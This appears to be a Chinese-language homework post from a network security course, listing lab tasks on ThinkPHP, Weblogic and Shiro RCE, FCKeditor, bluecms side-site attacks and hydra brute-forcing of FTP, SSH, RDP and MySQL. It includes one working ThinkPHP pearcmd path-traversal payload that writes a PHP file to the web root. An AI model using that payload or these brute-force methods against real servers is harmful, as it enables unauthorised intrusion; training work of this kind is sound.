@所有人 網路安全C10-2024.11.9
作業:
- RCE:分別實現ThinkPHP、Weblogic、Shiro漏洞的利用過程
ThinkPHP
?lang=../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?
=phpinfo()?>+/var/www/html/magedu1.php
Weblogic
方式1
方式2
Shiro漏洞
CVE-2016-4437
工具1
工具2
CVE-2020-1957
- FCKeditor編輯器漏洞實驗;
- bluecms旁註漏洞,並解釋為什麼旁站攻擊可以拿下主站?跨庫的意思是什麼?
旁站攻擊可以拿下主站原因:旁站與主站的服務部署在同一伺服器上,當拿下旁站時,可以透過資料庫等其他手段getshell,等於拿下主站
跨庫的意思是什麼:在同一伺服器中,資料庫管理系統是共享的,當拿下其中一埠所對應的web服務時,可以透過運算元據庫從而實現sql跨庫查詢來獲取其他資料庫檔案資訊
4、暴力猜解:hydra實現對ftp、ssh、rdp、mysql的暴力破解。
ftp
Ssh
rdp遠端桌面
mysql